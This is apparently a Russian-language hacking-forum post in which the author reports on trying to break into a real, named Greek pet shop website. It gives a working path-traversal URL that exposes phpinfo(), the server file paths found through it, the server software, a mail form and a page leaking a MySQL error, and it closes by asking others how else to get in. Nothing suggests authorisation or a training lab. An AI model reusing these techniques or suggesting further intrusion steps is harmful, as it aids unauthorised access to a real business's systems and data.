попугай, wildshaman, Strilo4ka спасибо за помощь и советы


копаю дальше
http://www.petshopdamigos.gr/index.php?action=/../../../../../../inetpub/vhosts/petshopdamigos.gr/httpdocs/admin/info - phpinfo()

есть
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\index .php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \index.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \config.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \functions.php
E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\admin \info.php
но текст их посмотреть нельзя, только исполнение через require()

http://www.petshopdamigos.gr/test - basic авторизация, ни .htaccess ни .htpasswd там нет, да и сервер там Microsoft-IIS/6.0

доступ к соседям закрыт - Permission denied

sql inj вроде как нигде нет

через http://www.petshopdamigos.gr/index.php?action=05 можно попасть на форму, которая через mail() будет слать письмо

http://www.petshopdamigos.gr/index.php?action=09 ссылок на которую ниоткуда нет выдает:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\inetpub\vhosts\petshopdamigos.gr\httpdocs\pages \action_09.php on line 9


есть идеи с какой стороны еще можно залезть ?